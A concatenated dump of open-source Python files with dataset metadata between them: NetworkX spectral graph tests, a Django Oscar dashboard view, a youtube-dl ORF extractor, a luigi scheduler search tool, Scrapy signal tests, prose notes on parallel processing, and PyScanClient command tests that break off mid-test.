assert_almost_equal(nx.algebraic_connectivity(
G, tol=1e-12, method=method), 2)
x = nx.fiedler_vector(G, tol=1e-12, method=method)
check_eigenvector(A, 2, x)
G = nx.MultiGraph()
G.add_edge(0, 0, spam=1e8)
G.add_edge(0, 1, spam=1)
G.add_edge(0, 1, spam=-2)
A = -3 * nx.laplacian_matrix(G, weight='spam')
for method in self._methods:
assert_almost_equal(nx.algebraic_connectivity(
G, weight='spam', tol=1e-12, method=method), 6)
x = nx.fiedler_vector(G, weight='spam', tol=1e-12, method=method)
check_eigenvector(A, 6, x)
@preserve_random_state
def test_path(self):
G = nx.path_graph(8)
A = nx.laplacian_matrix(G)
sigma = 2 - sqrt(2 + sqrt(2))
for method in self._methods:
assert_almost_equal(nx.algebraic_connectivity(
G, tol=1e-12, method=method), sigma)
x = nx.fiedler_vector(G, tol=1e-12, method=method)
check_eigenvector(A, sigma, x)
@preserve_random_state
def test_cycle(self):
G = nx.cycle_graph(8)
A = nx.laplacian_matrix(G)
sigma = 2 - sqrt(2)
for method in self._methods:
assert_almost_equal(nx.algebraic_connectivity(
G, tol=1e-12, method=method), sigma)
x = nx.fiedler_vector(G, tol=1e-12, method=method)
check_eigenvector(A, sigma, x)
@preserve_random_state
def test_buckminsterfullerene(self):
G = nx.Graph(
[(1, 10), (1, 41), (1, 59), (2, 12), (2, 42), (2, 60), (3, 6),
(3, 43), (3, 57), (4, 8), (4, 44), (4, 58), (5, 13), (5, 56),
(5, 57), (6, 10), (6, 31), (7, 14), (7, 56), (7, 58), (8, 12),
(8, 32), (9, 23), (9, 53), (9, 59), (10, 15), (11, 24), (11, 53),
(11, 60), (12, 16), (13, 14), (13, 25), (14, 26), (15, 27),
(15, 49), (16, 28), (16, 50), (17, 18), (17, 19), (17, 54),
(18, 20), (18, 55), (19, 23), (19, 41), (20, 24), (20, 42),
(21, 31), (21, 33), (21, 57), (22, 32), (22, 34), (22, 58),
(23, 24), (25, 35), (25, 43), (26, 36), (26, 44), (27, 51),
(27, 59), (28, 52), (28, 60), (29, 33), (29, 34), (29, 56),
(30, 51), (30, 52), (30, 53), (31, 47), (32, 48), (33, 45),
(34, 46), (35, 36), (35, 37), (36, 38), (37, 39), (37, 49),
(38, 40), (38, 50), (39, 40), (39, 51), (40, 52), (41, 47),
(42, 48), (43, 49), (44, 50), (45, 46), (45, 54), (46, 55),
(47, 54), (48, 55)])
for normalized in (False, True):
if not normalized:
A = nx.laplacian_matrix(G)
sigma = 0.2434017461399311
else:
A = nx.normalized_laplacian_matrix(G)
sigma = 0.08113391537997749
for method in methods:
try:
assert_almost_equal(nx.algebraic_connectivity(
G, normalized=normalized, tol=1e-12, method=method),
sigma)
x = nx.fiedler_vector(G, normalized=normalized, tol=1e-12,
method=method)
check_eigenvector(A, sigma, x)
except nx.NetworkXError as e:
if e.args not in (('Cholesky solver unavailable.',),
('LU solver unavailable.',)):
raise
_methods = ('tracemin', 'lanczos', 'lobpcg')
class TestSpectralOrdering(object):
numpy = 1
@classmethod
def setupClass(cls):
global numpy
try:
import numpy.linalg
import scipy.sparse
except ImportError:
raise SkipTest('SciPy not available.')
@preserve_random_state
def test_nullgraph(self):
for graph in (nx.Graph, nx.DiGraph, nx.MultiGraph, nx.MultiDiGraph):
G = graph()
assert_raises(nx.NetworkXError, nx.spectral_ordering, G)
@preserve_random_state
def test_singleton(self):
for graph in (nx.Graph, nx.DiGraph, nx.MultiGraph, nx.MultiDiGraph):
G = graph()
G.add_node('x')
assert_equal(nx.spectral_ordering(G), ['x'])
G.add_edge('x', 'x', weight=33)
G.add_edge('x', 'x', weight=33)
assert_equal(nx.spectral_ordering(G), ['x'])
@preserve_random_state
def test_unrecognized_method(self):
G = nx.path_graph(4)
assert_raises(nx.NetworkXError, nx.spectral_ordering, G,
method='unknown')
@preserve_random_state
def test_three_nodes(self):
G = nx.Graph()
G.add_weighted_edges_from([(1, 2, 1), (1, 3, 2), (2, 3, 1)],
weight='spam')
for method in self._methods:
order = nx.spectral_ordering(G, weight='spam', method=method)
assert_equal(set(order), set(G))
ok_(set([1, 3]) in (set(order[:-1]), set(order[1:])))
G = nx.MultiDiGraph()
G.add_weighted_edges_from([(1, 2, 1), (1, 3, 2), (2, 3, 1), (2, 3, 2)])
for method in self._methods:
order = nx.spectral_ordering(G, method=method)
assert_equal(set(order), set(G))
ok_(set([2, 3]) in (set(order[:-1]), set(order[1:])))
@preserve_random_state
def test_path(self):
path = list(range(10))
shuffle(path)
G = nx.Graph()
G.add_path(path)
for method in self._methods:
order = nx.spectral_ordering(G, method=method)
ok_(order in [path, list(reversed(path))])
@preserve_random_state
def test_disconnected(self):
G = nx.Graph()
G.add_path(range(0, 10, 2))
G.add_path(range(1, 10, 2))
for method in self._methods:
order = nx.spectral_ordering(G, method=method)
assert_equal(set(order), set(G))
seqs = [list(range(0, 10, 2)), list(range(8, -1, -2)),
list(range(1, 10, 2)), list(range(9, -1, -2))]
ok_(order[:5] in seqs)
ok_(order[5:] in seqs)
@preserve_random_state
def test_cycle(self):
path = list(range(10))
G = nx.Graph()
G.add_path(path, weight=5)
G.add_edge(path[-1], path[0], weight=1)
A = nx.laplacian_matrix(G).todense()
for normalized in (False, True):
for method in methods:
try:
order = nx.spectral_ordering(G, normalized=normalized,
method=method)
except nx.NetworkXError as e:
if e.args not in (('Cholesky solver unavailable.',),
('LU solver unavailable.',)):
raise
else:
if not normalized:
ok_(order in [[1, 2, 0, 3, 4, 5, 6, 9, 7, 8],
[8, 7, 9, 6, 5, 4, 3, 0, 2, 1]])
else:
ok_(order in [[1, 2, 3, 0, 4, 5, 9, 6, 7, 8],
[8, 7, 6, 9, 5, 4, 0, 3, 2, 1]])
_methods = ('tracemin', 'lanczos', 'lobpcg')
| bsd-3-clause | 7,188,892,658,606,244,000 | 8,199,519,774,208,463,000 | 36.465278 | 79 | 0.506858 | false |
nfletton/django-oscar | src/oscar/apps/dashboard/views.py | 32 | 7437 | from datetime import timedelta
from decimal import Decimal as D, ROUND_UP
from django.utils.timezone import now
from django.views.generic import TemplateView
from oscar.core.loading import get_model
from django.db.models import Avg, Sum, Count
from oscar.core.compat import get_user_model
from oscar.apps.promotions.models import AbstractPromotion
ConditionalOffer = get_model('offer', 'ConditionalOffer')
Voucher = get_model('voucher', 'Voucher')
Basket = get_model('basket', 'Basket')
StockAlert = get_model('partner', 'StockAlert')
Product = get_model('catalogue', 'Product')
Order = get_model('order', 'Order')
Line = get_model('order', 'Line')
User = get_user_model()
class IndexView(TemplateView):
"""
An overview view which displays several reports about the shop.
Supports the permission-based dashboard. It is recommended to add a
index_nonstaff.html template because Oscar's default template will
display potentially sensitive store information.
"""
def get_template_names(self):
if self.request.user.is_staff:
return ['dashboard/index.html', ]
else:
return ['dashboard/index_nonstaff.html', 'dashboard/index.html']
def get_context_data(self, **kwargs):
ctx = super(IndexView, self).get_context_data(**kwargs)
ctx.update(self.get_stats())
return ctx
def get_active_site_offers(self):
"""
Return active conditional offers of type "site offer". The returned
``Queryset`` of site offers is filtered by end date greater then
the current date.
"""
return ConditionalOffer.objects.filter(
end_datetime__gt=now(), offer_type=ConditionalOffer.SITE)
def get_active_vouchers(self):
"""
Get all active vouchers. The returned ``Queryset`` of vouchers
is filtered by end date greater then the current date.
"""
return Voucher.objects.filter(end_datetime__gt=now())
def get_number_of_promotions(self, abstract_base=AbstractPromotion):
"""
Get the number of promotions for all promotions derived from
*abstract_base*. All subclasses of *abstract_base* are queried
and if another abstract base class is found this method is executed
recursively.
"""
total = 0
for cls in abstract_base.__subclasses__():
if cls._meta.abstract:
total += self.get_number_of_promotions(cls)
else:
total += cls.objects.count()
return total
def get_open_baskets(self, filters=None):
"""
Get all open baskets. If *filters* dictionary is provided they will
be applied on all open baskets and return only filtered results.
"""
if filters is None:
filters = {}
filters['status'] = Basket.OPEN
return Basket.objects.filter(**filters)
def get_hourly_report(self, hours=24, segments=10):
"""
Get report of order revenue split up in hourly chunks. A report is
generated for the last *hours* (default=24) from the current time.
The report provides ``max_revenue`` of the hourly order revenue sum,
``y-range`` as the labeling for the y-axis in a template and
``order_total_hourly``, a list of properties for hourly chunks.
*segments* defines the number of labeling segments used for the y-axis
when generating the y-axis labels (default=10).
"""
# Get datetime for 24 hours agao
time_now = now().replace(minute=0, second=0)
start_time = time_now - timedelta(hours=hours - 1)
orders_last_day = Order.objects.filter(date_placed__gt=start_time)
order_total_hourly = []
for hour in range(0, hours, 2):
end_time = start_time + timedelta(hours=2)
hourly_orders = orders_last_day.filter(date_placed__gt=start_time,
date_placed__lt=end_time)
total = hourly_orders.aggregate(
Sum('total_incl_tax')
)['total_incl_tax__sum'] or D('0.0')
order_total_hourly.append({
'end_time': end_time,
'total_incl_tax': total
})
start_time = end_time
max_value = max([x['total_incl_tax'] for x in order_total_hourly])
divisor = 1
while divisor < max_value / 50:
divisor *= 10
max_value = (max_value / divisor).quantize(D('1'), rounding=ROUND_UP)
max_value *= divisor
if max_value:
segment_size = (max_value) / D('100.0')
for item in order_total_hourly:
item['percentage'] = int(item['total_incl_tax'] / segment_size)
y_range = []
y_axis_steps = max_value / D(str(segments))
for idx in reversed(range(segments + 1)):
y_range.append(idx * y_axis_steps)
else:
y_range = []
for item in order_total_hourly:
item['percentage'] = 0
ctx = {
'order_total_hourly': order_total_hourly,
'max_revenue': max_value,
'y_range': y_range,
}
return ctx
def get_stats(self):
datetime_24hrs_ago = now() - timedelta(hours=24)
orders = Order.objects.filter()
orders_last_day = orders.filter(date_placed__gt=datetime_24hrs_ago)
open_alerts = StockAlert.objects.filter(status=StockAlert.OPEN)
closed_alerts = StockAlert.objects.filter(status=StockAlert.CLOSED)
total_lines_last_day = Line.objects.filter(
order__in=orders_last_day).count()
stats = {
'total_orders_last_day': orders_last_day.count(),
'total_lines_last_day': total_lines_last_day,
'average_order_costs': orders_last_day.aggregate(
Avg('total_incl_tax')
)['total_incl_tax__avg'] or D('0.00'),
'total_revenue_last_day': orders_last_day.aggregate(
Sum('total_incl_tax')
)['total_incl_tax__sum'] or D('0.00'),
'hourly_report_dict': self.get_hourly_report(hours=24),
'total_customers_last_day': User.objects.filter(
date_joined__gt=datetime_24hrs_ago,
).count(),
'total_open_baskets_last_day': self.get_open_baskets({
'date_created__gt': datetime_24hrs_ago
}).count(),
'total_products': Product.objects.count(),
'total_open_stock_alerts': open_alerts.count(),
'total_closed_stock_alerts': closed_alerts.count(),
'total_site_offers': self.get_active_site_offers().count(),
'total_vouchers': self.get_active_vouchers().count(),
'total_promotions': self.get_number_of_promotions(),
'total_customers': User.objects.count(),
'total_open_baskets': self.get_open_baskets().count(),
'total_orders': orders.count(),
'total_lines': Line.objects.filter(order__in=orders).count(),
'total_revenue': orders.aggregate(
Sum('total_incl_tax')
)['total_incl_tax__sum'] or D('0.00'),
'order_status_breakdown': orders.order_by(
'status'
).values('status').annotate(freq=Count('id'))
}
return stats
| bsd-3-clause | -8,092,620,302,921,056,000 | -2,825,389,838,340,537,300 | 37.734375 | 79 | 0.591636 | false |
iitjee/steppinsPython | SystemProgramming/Parallel System/00 intro.py | 1 | 2190 | Most computers spend a lot of time doing nothing. If you start a system monitor tool and watch the CPU utilization, you’ll see
what I mean—it’s rare to see one hit 100 percent, even when you are running multiple programs.* There are just too many delays
built into software: disk accesses, network traffic, database queries, waiting for users to click a button, and so on. In
fact, the majority of a modern CPU’s capacity is often spent in an idle state; faster chips help speed up performance demand
peaks, but much of their power can go largely unused.
Early on in computing, programmers realized that they could tap into such unused processing power by running more than one
program at the same time. By dividing the CPU’s attention among a set of tasks, its capacity need not go to waste while any
given task is waiting for an external event to occur. The technique is usually called parallel processing (and sometimes
“multiprocessing” or even “multitasking”) because many tasks seem to be performed at once, overlapping and parallel in time.
It’s at the heart of modern operating systems, and it gave rise to the notion of multiple-active-window computer interfaces
we’ve all come to take for granted.
here are two fundamental ways to get tasks running at the same time in Python— process forks and spawned threads.
Functionally, both rely on underlying operating system services to run bits of Python code in parallel. Procedurally, they are
very dif- ferent in terms of interface, portability, and communication.
for eg: direct process forks are not supported on Windows under standard Python whereas Python’s thread support works on all
major platforms.
in this chapter is on introducing more direct techniques—forks, threads, pipes, signals, sockets, and other launching
techniques—and on using Py- thon’s built-in tools that support them, such as the os.fork call and the threading, queue, and
multiprocessing modules.
External Tools (3rd Party):
MPI for Python system allows Python scripts to also employ the Message Passing Interface (MPI) standard, allowing Python
programs to exploit multiple processors in various way
| gpl-3.0 | 4,764,080,521,360,545,000 | -6,905,916,995,257,661,000 | 76.071429 | 127 | 0.796571 | false |
jc0n/scrapy | tests/test_utils_signal.py | 121 | 2741 | from testfixtures import LogCapture
from twisted.trial import unittest
from twisted.python.failure import Failure
from twisted.internet import defer, reactor
from pydispatch import dispatcher
from scrapy.utils.signal import send_catch_log, send_catch_log_deferred
class SendCatchLogTest(unittest.TestCase):
@defer.inlineCallbacks
def test_send_catch_log(self):
test_signal = object()
handlers_called = set()
dispatcher.connect(self.error_handler, signal=test_signal)
dispatcher.connect(self.ok_handler, signal=test_signal)
with LogCapture() as l:
result = yield defer.maybeDeferred(
self._get_result, test_signal, arg='test',
handlers_called=handlers_called
)
assert self.error_handler in handlers_called
assert self.ok_handler in handlers_called
self.assertEqual(len(l.records), 1)
record = l.records[0]
self.assertIn('error_handler', record.getMessage())
self.assertEqual(record.levelname, 'ERROR')
self.assertEqual(result[0][0], self.error_handler)
self.assert_(isinstance(result[0][1], Failure))
self.assertEqual(result[1], (self.ok_handler, "OK"))
dispatcher.disconnect(self.error_handler, signal=test_signal)
dispatcher.disconnect(self.ok_handler, signal=test_signal)
def _get_result(self, signal, *a, **kw):
return send_catch_log(signal, *a, **kw)
def error_handler(self, arg, handlers_called):
handlers_called.add(self.error_handler)
a = 1/0
def ok_handler(self, arg, handlers_called):
handlers_called.add(self.ok_handler)
assert arg == 'test'
return "OK"
class SendCatchLogDeferredTest(SendCatchLogTest):
def _get_result(self, signal, *a, **kw):
return send_catch_log_deferred(signal, *a, **kw)
class SendCatchLogDeferredTest2(SendCatchLogTest):
def ok_handler(self, arg, handlers_called):
handlers_called.add(self.ok_handler)
assert arg == 'test'
d = defer.Deferred()
reactor.callLater(0, d.callback, "OK")
return d
def _get_result(self, signal, *a, **kw):
return send_catch_log_deferred(signal, *a, **kw)
class SendCatchLogTest2(unittest.TestCase):
def test_error_logged_if_deferred_not_supported(self):
test_signal = object()
test_handler = lambda: defer.Deferred()
dispatcher.connect(test_handler, test_signal)
with LogCapture() as l:
send_catch_log(test_signal)
self.assertEqual(len(l.records), 1)
self.assertIn("Cannot return deferreds from signal handler", str(l))
dispatcher.disconnect(test_handler, test_signal)
| bsd-3-clause | 1,809,620,048,862,520,000 | 55,341,456,848,792,870 | 33.696203 | 76 | 0.660343 | false |
Dino0631/RedRain-Bot | cogs/lib/youtube_dl/extractor/orf.py | 17 | 10860 | # coding: utf-8
from __future__ import unicode_literals
import re
from .common import InfoExtractor
from ..compat import compat_str
from ..utils import (
HEADRequest,
unified_strdate,
strip_jsonp,
int_or_none,
float_or_none,
determine_ext,
remove_end,
unescapeHTML,
)
class ORFTVthekIE(InfoExtractor):
IE_NAME = 'orf:tvthek'
IE_DESC = 'ORF TVthek'
_VALID_URL = r'https?://tvthek\.orf\.at/(?:[^/]+/)+(?P<id>\d+)'
_TESTS = [{
'url': 'http://tvthek.orf.at/program/Aufgetischt/2745173/Aufgetischt-Mit-der-Steirischen-Tafelrunde/8891389',
'playlist': [{
'md5': '2942210346ed779588f428a92db88712',
'info_dict': {
'id': '8896777',
'ext': 'mp4',
'title': 'Aufgetischt: Mit der Steirischen Tafelrunde',
'description': 'md5:c1272f0245537812d4e36419c207b67d',
'duration': 2668,
'upload_date': '20141208',
},
}],
'skip': 'Blocked outside of Austria / Germany',
}, {
'url': 'http://tvthek.orf.at/topic/Im-Wandel-der-Zeit/8002126/Best-of-Ingrid-Thurnher/7982256',
'info_dict': {
'id': '7982259',
'ext': 'mp4',
'title': 'Best of Ingrid Thurnher',
'upload_date': '20140527',
'description': 'Viele Jahre war Ingrid Thurnher das "Gesicht" der ZIB 2. Vor ihrem Wechsel zur ZIB 2 im Jahr 1995 moderierte sie unter anderem "Land und Leute", "Österreich-Bild" und "Niederösterreich heute".',
},
'params': {
'skip_download': True, # rtsp downloads
},
'_skip': 'Blocked outside of Austria / Germany',
}, {
'url': 'http://tvthek.orf.at/topic/Fluechtlingskrise/10463081/Heimat-Fremde-Heimat/13879132/Senioren-betreuen-Migrantenkinder/13879141',
'skip_download': True,
}, {
'url': 'http://tvthek.orf.at/profile/Universum/35429',
'skip_download': True,
}]
def _real_extract(self, url):
playlist_id = self._match_id(url)
webpage = self._download_webpage(url, playlist_id)
data_jsb = self._parse_json(
self._search_regex(
r'<div[^>]+class=(["\']).*?VideoPlaylist.*?\1[^>]+data-jsb=(["\'])(?P<json>.+?)\2',
webpage, 'playlist', group='json'),
playlist_id, transform_source=unescapeHTML)['playlist']['videos']
def quality_to_int(s):
m = re.search('([0-9]+)', s)
if m is None:
return -1
return int(m.group(1))
entries = []
for sd in data_jsb:
video_id, title = sd.get('id'), sd.get('title')
if not video_id or not title:
continue
video_id = compat_str(video_id)
formats = [{
'preference': -10 if fd['delivery'] == 'hls' else None,
'format_id': '%s-%s-%s' % (
fd['delivery'], fd['quality'], fd['quality_string']),
'url': fd['src'],
'protocol': fd['protocol'],
'quality': quality_to_int(fd['quality']),
} for fd in sd['sources']]
# Check for geoblocking.
# There is a property is_geoprotection, but that's always false
geo_str = sd.get('geoprotection_string')
if geo_str:
try:
http_url = next(
f['url']
for f in formats
if re.match(r'^https?://.*\.mp4$', f['url']))
except StopIteration:
pass
else:
req = HEADRequest(http_url)
self._request_webpage(
req, video_id,
note='Testing for geoblocking',
errnote=((
'This video seems to be blocked outside of %s. '
'You may want to try the streaming-* formats.')
% geo_str),
fatal=False)
self._check_formats(formats, video_id)
self._sort_formats(formats)
subtitles = {}
for sub in sd.get('subtitles', []):
sub_src = sub.get('src')
if not sub_src:
continue
subtitles.setdefault(sub.get('lang', 'de-AT'), []).append({
'url': sub_src,
})
upload_date = unified_strdate(sd.get('created_date'))
entries.append({
'_type': 'video',
'id': video_id,
'title': title,
'formats': formats,
'subtitles': subtitles,
'description': sd.get('description'),
'duration': int_or_none(sd.get('duration_in_seconds')),
'upload_date': upload_date,
'thumbnail': sd.get('image_full_url'),
})
return {
'_type': 'playlist',
'entries': entries,
'id': playlist_id,
}
class ORFRadioIE(InfoExtractor):
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
station = mobj.group('station')
show_date = mobj.group('date')
show_id = mobj.group('show')
if station == 'fm4':
show_id = '4%s' % show_id
data = self._download_json(
'http://audioapi.orf.at/%s/api/json/current/broadcast/%s/%s' % (station, show_id, show_date),
show_id
)
def extract_entry_dict(info, title, subtitle):
return {
'id': info['loopStreamId'].replace('.mp3', ''),
'url': 'http://loopstream01.apa.at/?channel=%s&id=%s' % (station, info['loopStreamId']),
'title': title,
'description': subtitle,
'duration': (info['end'] - info['start']) / 1000,
'timestamp': info['start'] / 1000,
'ext': 'mp3'
}
entries = [extract_entry_dict(t, data['title'], data['subtitle']) for t in data['streams']]
return {
'_type': 'playlist',
'id': show_id,
'title': data['title'],
'description': data['subtitle'],
'entries': entries
}
class ORFFM4IE(ORFRadioIE):
IE_NAME = 'orf:fm4'
IE_DESC = 'radio FM4'
_VALID_URL = r'https?://(?P<station>fm4)\.orf\.at/player/(?P<date>[0-9]+)/(?P<show>\w+)'
_TEST = {
'url': 'http://fm4.orf.at/player/20170107/CC',
'md5': '2b0be47375432a7ef104453432a19212',
'info_dict': {
'id': '2017-01-07_2100_tl_54_7DaysSat18_31295',
'ext': 'mp3',
'title': 'Solid Steel Radioshow',
'description': 'Die Mixshow von Coldcut und Ninja Tune.',
'duration': 3599,
'timestamp': 1483819257,
'upload_date': '20170107',
},
'skip': 'Shows from ORF radios are only available for 7 days.'
}
class ORFOE1IE(ORFRadioIE):
IE_NAME = 'orf:oe1'
IE_DESC = 'Radio Österreich 1'
_VALID_URL = r'https?://(?P<station>oe1)\.orf\.at/player/(?P<date>[0-9]+)/(?P<show>\w+)'
_TEST = {
'url': 'http://oe1.orf.at/player/20170108/456544',
'md5': '34d8a6e67ea888293741c86a099b745b',
'info_dict': {
'id': '2017-01-08_0759_tl_51_7DaysSun6_256141',
'ext': 'mp3',
'title': 'Morgenjournal',
'duration': 609,
'timestamp': 1483858796,
'upload_date': '20170108',
},
'skip': 'Shows from ORF radios are only available for 7 days.'
}
class ORFIPTVIE(InfoExtractor):
IE_NAME = 'orf:iptv'
IE_DESC = 'iptv.ORF.at'
_VALID_URL = r'https?://iptv\.orf\.at/(?:#/)?stories/(?P<id>\d+)'
_TEST = {
'url': 'http://iptv.orf.at/stories/2275236/',
'md5': 'c8b22af4718a4b4af58342529453e3e5',
'info_dict': {
'id': '350612',
'ext': 'flv',
'title': 'Weitere Evakuierungen um Vulkan Calbuco',
'description': 'md5:d689c959bdbcf04efeddedbf2299d633',
'duration': 68.197,
'thumbnail': r're:^https?://.*\.jpg$',
'upload_date': '20150425',
},
}
def _real_extract(self, url):
story_id = self._match_id(url)
webpage = self._download_webpage(
'http://iptv.orf.at/stories/%s' % story_id, story_id)
video_id = self._search_regex(
r'data-video(?:id)?="(\d+)"', webpage, 'video id')
data = self._download_json(
'http://bits.orf.at/filehandler/static-api/json/current/data.json?file=%s' % video_id,
video_id)[0]
duration = float_or_none(data['duration'], 1000)
video = data['sources']['default']
load_balancer_url = video['loadBalancerUrl']
abr = int_or_none(video.get('audioBitrate'))
vbr = int_or_none(video.get('bitrate'))
fps = int_or_none(video.get('videoFps'))
width = int_or_none(video.get('videoWidth'))
height = int_or_none(video.get('videoHeight'))
thumbnail = video.get('preview')
rendition = self._download_json(
load_balancer_url, video_id, transform_source=strip_jsonp)
f = {
'abr': abr,
'vbr': vbr,
'fps': fps,
'width': width,
'height': height,
}
formats = []
for format_id, format_url in rendition['redirect'].items():
if format_id == 'rtmp':
ff = f.copy()
ff.update({
'url': format_url,
'format_id': format_id,
})
formats.append(ff)
elif determine_ext(format_url) == 'f4m':
formats.extend(self._extract_f4m_formats(
format_url, video_id, f4m_id=format_id))
elif determine_ext(format_url) == 'm3u8':
formats.extend(self._extract_m3u8_formats(
format_url, video_id, 'mp4', m3u8_id=format_id))
else:
continue
self._sort_formats(formats)
title = remove_end(self._og_search_title(webpage), ' - iptv.ORF.at')
description = self._og_search_description(webpage)
upload_date = unified_strdate(self._html_search_meta(
'dc.date', webpage, 'upload date'))
return {
'id': video_id,
'title': title,
'description': description,
'duration': duration,
'thumbnail': thumbnail,
'upload_date': upload_date,
'formats': formats,
}
| gpl-3.0 | 2,996,429,475,487,731,000 | 8,071,703,934,864,872,000 | 34.135922 | 222 | 0.495072 | false |
Viktor-Evst/fixed-luigi | luigi/tools/luigi_grep.py | 12 | 2854 | #!/usr/bin/env python
import argparse
import json
from collections import defaultdict
from luigi import six
from luigi.six.moves.urllib.request import urlopen
class LuigiGrep(object):
def __init__(self, host, port):
self._host = host
self._port = port
@property
def graph_url(self):
return "http://{0}:{1}/api/graph".format(self._host, self._port)
def _fetch_json(self):
"""Returns the json representation of the dep graph"""
print("Fetching from url: " + self.graph_url)
resp = urlopen(self.graph_url).read()
return json.loads(resp.decode('utf-8'))
def _build_results(self, jobs, job):
job_info = jobs[job]
deps = job_info['deps']
deps_status = defaultdict(list)
for j in deps:
if j in jobs:
deps_status[jobs[j]['status']].append(j)
else:
deps_status['UNKNOWN'].append(j)
return {"name": job, "status": job_info['status'], "deps_by_status": deps_status}
def prefix_search(self, job_name_prefix):
"""searches for jobs matching the given job_name_prefix."""
json = self._fetch_json()
jobs = json['response']
for job in jobs:
if job.startswith(job_name_prefix):
yield self._build_results(jobs, job)
def status_search(self, status):
"""searches for jobs matching the given status"""
json = self._fetch_json()
jobs = json['response']
for job in jobs:
job_info = jobs[job]
if job_info['status'].lower() == status.lower():
yield self._build_results(jobs, job)
def main():
parser = argparse.ArgumentParser(
"luigi-grep is used to search for workflows using the luigi scheduler's json api")
parser.add_argument(
"--scheduler-host", default="localhost", help="hostname of the luigi scheduler")
parser.add_argument(
"--scheduler-port", default="8082", help="port of the luigi scheduler")
parser.add_argument("--prefix", help="prefix of a task query to search for", default=None)
parser.add_argument("--status", help="search for jobs with the given status", default=None)
args = parser.parse_args()
grep = LuigiGrep(args.scheduler_host, args.scheduler_port)
results = []
if args.prefix:
results = grep.prefix_search(args.prefix)
elif args.status:
results = grep.status_search(args.status)
for job in results:
print("{name}: {status}, Dependencies:".format(name=job['name'], status=job['status']))
for (status, jobs) in six.iteritems(job['deps_by_status']):
print(" status={status}".format(status=status))
for job in jobs:
print(" {job}".format(job=job))
if __name__ == '__main__':
main()
| apache-2.0 | 2,943,911,845,265,211,000 | 8,754,499,670,123,700,000 | 32.97619 | 95 | 0.600561 | false |
PythonScanClient/PyScanClient | Test/test_commands.py | 1 | 14881 | from __future__ import print_function
import unittest
import xml.etree.ElementTree as ET
from scan.commands import *
# These tests compare the XML as strings, even though for example
# both "<comment><text>Hello</text></comment>"
# and "<comment>\n <text>Hello</text>\n</comment>"
# would be acceptable XML representations.
# Changes to the XML could result in the need to update the tests.
class CommandTest(unittest.TestCase):
def testXMLEscape(self):
# Basic comment
cmd = Comment("Hello")
print(cmd)
self.assertEqual(ET.tostring(cmd.genXML()), b"<comment><text>Hello</text></comment>")
# Check proper escape of "less than"
cmd = Comment("Check for current < 10")
print(cmd)
self.assertEqual(ET.tostring(cmd.genXML()), b"<comment><text>Check for current < 10</text></comment>")
def testDelayCommand(self):
# Basic set
cmd = Delay(47.11)
print(cmd)
self.assertEqual(str(cmd), "Delay(47.11)")
self.assertEqual(ET.tostring(cmd.genXML()), b"<delay><seconds>47.11</seconds></delay>")
def testConfig(self):
# Basic set
cmd = ConfigLog(True)
print(cmd)
self.assertEqual(str(cmd), "ConfigLog(True)")
self.assertEqual(ET.tostring(cmd.genXML()), b"<config_log><automatic>true</automatic></config_log>")
def testSetCommand(self):
# Basic set
cmd = Set("some_device", 3.14)
print(cmd)
self.assertEqual(str(cmd), "Set('some_device', 3.14)")
self.assertEqual(ET.tostring(cmd.genXML()), b"<set><device>some_device</device><value>3.14</value><wait>false</wait></set>")
# Handle numeric as well as string for value
cmd = Set("some_device", "Text")
print(cmd)
self.assertEqual(str(cmd), "Set('some_device', 'Text')")
self.assertEqual(ET.tostring(cmd.genXML()), b"<set><device>some_device</device><value>\"Text\"</value><wait>false</wait></set>")
# With completion
cmd = Set("some_device", 3.14, completion=True)
print(cmd)
self.assertEqual(ET.tostring(cmd.genXML()), b"<set><device>some_device</device><value>3.14</value><completion>true</completion><wait>false</wait></set>")
# .. and timeout
cmd = Set("some_device", 3.14, completion=True, timeout=5.0)
print(cmd)
self.assertEqual(ET.tostring(cmd.genXML()), b"<set><device>some_device</device><value>3.14</value><completion>true</completion><wait>false</wait><timeout>5.0</timeout></set>")
# Setting a readback PV (the default one) enables wait-on-readback
cmd = Set("some_device", 3.14, completion=True, readback=True, tolerance=1, timeout=10.0)
print(cmd)
self.assertEqual(ET.tostring(cmd.genXML()), b"<set><device>some_device</device><value>3.14</value><completion>true</completion><wait>true</wait><readback>some_device</readback><tolerance>1</tolerance><timeout>10.0</timeout></set>")
# Setting a readback PV (a specific one) enables wait-on-readback
cmd = Set("some_device", 3.14, completion=True, readback="some_device.RBV", tolerance=1, timeout=10.0)
print(cmd)
self.assertEqual(str(cmd), b"Set('some_device', 3.14, completion=True, timeout=10.0, readback='some_device.RBV', tolerance=1.000000)")
self.assertEqual(ET.tostring(cmd.genXML()), b"<set><device>some_device</device><value>3.14</value><completion>true</completion><wait>true</wait><readback>some_device.RBV</readback><tolerance>1</tolerance><timeout>10.0</timeout></set>")
# Readback value different from the written value
cmd = Set("some_device", 3.14, completion=True, readback="other_device", readback_value=1, tolerance=1, timeout=10.0)
print(cmd)
self.assertEqual(str(cmd), b"Set('some_device', 3.14, completion=True, timeout=10.0, readback='other_device', readback_value=1, tolerance=1.000000)")
self.assertEqual(ET.tostring(cmd.genXML()), b"<set><device>some_device</device><value>3.14</value><completion>true</completion><wait>true</wait><readback>other_device</readback><readback_value>1</readback_value><tolerance>1</tolerance><timeout>10.0</timeout></set>")
# Readback value uses string
cmd = Set("some_device", 3.14, completion=True, readback="status", readback_value='OK', tolerance=0, timeout=10.0)
print(cmd)
self.assertEqual(str(cmd), b"Set('some_device', 3.14, completion=True, timeout=10.0, readback='status', readback_value='OK')")
self.assertEqual(ET.tostring(cmd.genXML()), b"<set><device>some_device</device><value>3.14</value><completion>true</completion><wait>true</wait><readback>status</readback><readback_value>\"OK\"</readback_value><tolerance>0</tolerance><timeout>10.0</timeout></set>")
def testSequence(self):
# Nothing
cmd = Sequence()
print(cmd)
self.assertEqual(ET.tostring(cmd.genXML()), b"<sequence />")
# A few
cmd = Sequence(Comment("One"), Comment("Two"))
print(cmd.format())
self.assertEqual(ET.tostring(cmd.genXML()), b"<sequence><body><comment><text>One</text></comment><comment><text>Two</text></comment></body></sequence>")
# Sequences are 'flattened'
s1 = Sequence(Comment("One"), Comment("Two"))
s2 = Sequence(Comment("Four"), Comment("Five"))
seq1 = Sequence(s1, Comment("Three"), s2)
print(seq1.format())
seq2 = Sequence(Comment("One"), Comment("Two"), Comment("Three"), s2)
print(seq2.format())
self.assertEqual(ET.tostring(seq1.genXML()), ET.tostring(seq2.genXML()) )
def testParallel(self):
# Nothing
cmd = Parallel()
print(cmd)
self.assertEqual(ET.tostring(cmd.genXML()), b"<parallel />")
# A few
cmd = Parallel(Comment("One"), Comment("Two"))
print(cmd)
